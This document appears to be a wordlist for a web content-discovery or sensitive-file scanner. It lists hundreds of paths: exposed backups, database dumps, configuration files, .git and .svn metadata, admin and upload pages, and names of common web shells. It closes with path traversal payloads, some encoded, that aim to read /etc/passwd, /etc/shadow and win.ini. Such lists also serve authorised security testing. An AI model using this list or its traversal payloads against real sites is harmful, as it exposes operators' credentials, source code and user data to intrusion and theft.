test.tar.gz
1.html
1.txt
aaa.php
aa.php
uniform_pay.fcg
agent.php
access_log
access.log
Add.jsp
admin.jsp
Admin.jsp
admin.php
Admin.php
admin.txt
admin.tar.gz
admin.rar
admin.do
adm.jsp
Adm.jsp
adm.php
Adm.php
a.php
A.php
back.php
backup.sql
bak/2012-12-25.rar
bak/2012-12-25.tar.gz
bak/2012.rar
bak/2012.tar.gz
bak/htdocs.rar
bak/htdocs.tar.gz
bak/htdocs.zip
bak.sql
bak/wwwroot.rar
bak/wwwroot.tar.gz
bak/wwwroot.zip
.bash_history
.bash_profile
.bashrc
bbs.tar.gz
beifen.rar
beifen.tar.gz
beifen.zip
build.sh
cgi-bin/printenv
check.jsp
Check.jsp
check.php
Check.php
com.sap.ctc.util.ConfigServlet
func.inc
functions.inc
cacti.txt
cacti.sql
code.jsp
.config_ucenter.php
.config.inc.php.swp
config.bak
config.tar
config_global.php.1
config_global.php.bak
config.inc.php.1
config-inc.php.bak
config.inc.php.bak
config.jsp
Config.jsp
Config.tar
config.php
config.php1
config.php12
config.php123
Config.php
config.php.1
config.php.bak
config.inc.php.bak
config.inc.php.1
config_ucenter.php.1
config_ucenter.php.bak 
conf.jsp
Conf.jsp
conf.php
Conf.php
controlpanel.php
connection.jsp
Connection.jsp
connection.php
Connection.php
connect.inc
conn.inc
conn.txt
common.inc
common.inc.php.bak
Common.inc.php.bak
ctc/servlet/com.sap.ctc.util.ConfigServlet
CVS/Entries
database.sql
database.tar.gz
data.rar
data.sql
data.tar
data.tar.gz
database.inc
dbconfig.php
db.sql
db.sql.tar
db.sql.tar.gz
db.tar
db.inc
db.tar.gz
dev.tar
dev.tar.gz
demo.php
ddt.rar
ddt.tar
ddt.tar.gz
default.jsp
Default.jsp
default.php
Default.php
edit.jsp
Edit.jsp
editor/fckeditor/editor/filemanager/connectors/uploadtest.html
editor/filemanager/browser/default/browser.html
editor/filemanager/browser/default/connectors/php/connector.php
editor/filemanager/connectors/php/connector.php
editor/filemanager/connectors/test.html
editor/filemanager/upload/php/upload.php
editor/filemanager/upload/test.html
editor.jsp
Editor.jsp
editor.php
Editor.php
edit.php
Edit.php
error_log
err_log.db
error.log
favicon.ico/1.php
FCKeditor/editor/FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/editor/filemanager/browser/default/browser.html
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
FCKeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/upload/php/upload.php
FCKeditor/editor/filemanager/upload/test.html
file.jsp
File.jsp
file.php
File.php
files.jsp
Files.jsp
files.php
Files.php
frags/Utils.php
ftp.txt
.git/index
.git/config
.git/logs
game.rar
gameroot.rar
game.tar.gz
global.txt
global.php
guanli.jsp
GuanLi.jsp
guanli.php
guige.jsp
guige.php
GuanLi.php
help.txt
houtai.jsp
HouTai.jsp
houtai.php
HouTai.php
.htaccess
htdocs.rar
htdocs.tar.gz
htdocs.zip
html.rar
html.tar.gz
html.zip
.htpasswd
iesvc/iesvc.jsp
iesvc.jsp
i.jsp
I.jsp
index.action
index.jsp
index.php?act=phpinfo
index.log
info.php
info.txt
Install
install/install.jsp
install/install.php
install.jsp
install.log
install.php
install.sh
invoker
invoker/JMXInvokerServlet
i.php
I.php
j_security_check
jmx-console.war
JMXInvokerServlet
jviewer.jnlp
log.log
log/2012-12-25.log
log/2012-12-25.txt
log/2012/2012-12-25.log
log/2012/20121225.log
log/2012/2012-12-25.txt
log/2012/20121225.txt
login.action
login.html
login.jsp
login.do
Login.jsp
login.php
Login.php
log.jsp
Log.jsp
log.php
Log.php
logs.rar
logs.tar.gz
logs.zip
main.jsp
Main.jsp
main.php
Main.php
manage.htm
manage.jsp
Manage.jsp
manage.php
Manage.php
manager.jsp
Manager.jsp
manager_login.jsp
Manager_Login.jsp
manager_login.php
Manager_Login.php
manager.php
Manager.php
master.jsp
Master.jsp
master.php
Master.php
member.jsp
Member.jsp
memberlogin.jsp
MemberLogin.jsp
memberlogin.php
MemberLogin.php
member.php
Member.php
members.jsp
Members.jsp
members.php
Members.php
memcache.php
merged-db-3.rar
mgr.jsp
Mgr.jsp
mgr.php
Mgr.php
mima.txt
m.jsp
M.jsp
m.php
M.php
myadmin.jsp
MyAdmin.jsp
myadmin.php
MyAdmin.php
my.php
myfile.jsp
mysql_error.log 
mysql.rar
mysqlserver.jsp
mysqlserver.php
notexist_path.log
notify.action
nohup.out
pass.txt
passwd
password.txt
passwords.txt
pay/notify/notify.action
pengyou.rar
pengyou.tar
pengyou.tar.gz
pengyou.zip
php/frags/FragEgine.php
phpinfo.php
phpmyadmin.rar
phpMyAdmin.rar
phpmyadmin/server_sync.php
phpMyAdmin/server_sync.php
phpmyadmin.zip
phpMyAdmin.zip
pma.jsp
PMA.jsp
pma.php
PMA.php
pma/server_sync.php
PMA/server_sync.php
popup.jsp
proxy.txt
proxy.php
popup.php
pp.php
pstock.tar.gz
qq123.sql
qq.rar
qq.sql
qq.tar
qq.tar.gz
qq.txt
qq.zip
query.do
ray.php
readme.txt
r.jsp
R.jsp
.rediscli_history
root.jsp
Root.jsp
root.php
Root.php
robots.txt/a.php
robots.txt%00.php
r.php
R.php
struts/webconsole.html
s21.rar
s22.rar
server-info
server.php
server.rar
server-status
sftp-config.json
shell.asp
shell.aspx
shell.jsp
shell.php
s.jsp
S.jsp
soso.rar
soso.sql
soso.tar
soso.tar.gz
soso.txt
soso.zip
sysinfo.jsp
s.php
S.php
selDept.php
sqlconf.jsp
SqlConf.jsp
sqlconf.php
SqlConf.php
sqldump.sql
sql.jsp
Sql.jsp
sql.log
show_config_errors.php
sqlmanager.jsp
SQL_Manager.jsp
sqlmanager.php
SQL_Manager.php
sqlnet.log
sql.php
Sql.php
sql.inc
Sql.inc
sql.rar
sql.sql
sql.txt
sql2.txt
sql.tar.gz
SQL_System.jsp
SQL_System.php
_svn/entries
.svn/entries
sxd1.rar
sxd20.rar
sxd3.rar
sys_login.jsp
Sys_Login.jsp
sys_login.php
Sys_Login.php
tag.php
tenpay.rar
tenpay.tar.gz
tenpay.txt
tenpay.zip
test.jsp
Test.jsp
test.php
Test.php
test.sql
test.txt
test.html
tool.jsp
tool.php
tools.jsp
tools.php
top.jsp
Top.jsp
top.php
Top.php
t.php
u.jsp
U.jsp
upfile.php
upgrade.jsp
Upgrade.jsp
upgrade.php
Upgrade.php
u.php
U.php
up.jsp
upload_files.jsp
uploadfiles.jsp
UploadFiles.jsp
upload_files.php
uploadfiles.php
UploadFiles.php
Upload.j
upload.jsp
upload.php
upload.do
uploadd.php
Upload.php
upload.htm
upload.html
Upload.html
Upload.htm
up.php
users.rar
users.sql
users.tar
users.tar.gz
user.txt
userlist.php
userlist.txt
users.txt
users.zip
userlist.tar
web1.jsp
Web1.jsp
web1.php
Web1.php
web2.jsp
Web2.jsp
web2.php
Web2.php
webdev.jsp
webdev.php
WEB-INF/classes/applicationContext-config.xml
WEB-INF/classes/applicationContext-jms.xml
WEB-INF/classes/applicationContext.xml
WEB-INF/classes/jdbc.properties
WEB-INF/classes/struts.xml
WEB-INF/classes/init.properties
WEB-INF/classes/spring.xml
WEB-INF/classes/struts.xml
WEB-INF/classes/struts_manager.xml
WEB-INF/classes/conf/datasource.xml
WEB-INF/classes/data.xml
WEB-INF/classes/config/applicationContext.xml
WEB-INF/classes/applicationContext.xml
WEB-INF/classes/conf/spring/applicationContext-datasource.xml
WEB-INF/classes/hibernate.cfg.xml
WEB-INF/config/db/dataSource.xml
WEB-INF/spring-cfg/applicationContext.xml
WEB-INF/struts-config.xml
WEB-INF/struts.xml
WEB-INF/web.xml
WEB-INF/config.xml
WEB-INF/spring.xml
WEB-INF/applicationContext-slave.xml
WEB-INF/database.properties
WEB-INF/web.properties
WEB-INF/log4j.properties
WEB-INF/classes/dataBase.properties
WEB-INF/classes/application.properties
WEB-INF/classes/jdbc.properties
WEB-INF/classes/db.properties
WEB-INF/classes/conf/jdbc.properties
WEB-INF/classes/security.properties
WEB-INF/conf/database_config.properties
WEB-INF/config/dbconfig
WEB-INF/conf/activemq.xml
WEB-INF/dwr.xml
web.jsp
Web.jsp
web_master.jsp
webmaster.jsp
Web_Master.jsp
WebMaster.jsp
web_master.php
webmaster.php
Web_Master.php
WebMaster.php
web.php
Web.php
WebResource.axd
webserver.tar
webserver.tar.gz
webserver.zip
web.rar
web.tar.gz
wget.sh
wg.rar
wp-login.php
ws_ftp.ini
WS_FTP.ini
webroot.rar
wwwroot.rar
wwwroot.tar
wwwroot.tar.gz
wwwroot.zip
www.sql
www.tar
www.tar.gz
www.zip
x.jsp
X.jsp
x.php
xmlrpc
X.php
xx.php
xxx.php
y.jsp
Y.jsp
y.php
Y.php
etc/passwd
api.php?op=ajax_domain&url=/etc/passwd
etc/passwd
etc/hosts
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
.../.../.../.../.../.../.../.../windows/win.ini
../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../etc/passwd
/././././././././././././././././././././././././../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
ku8cmd.jsp
备份.rar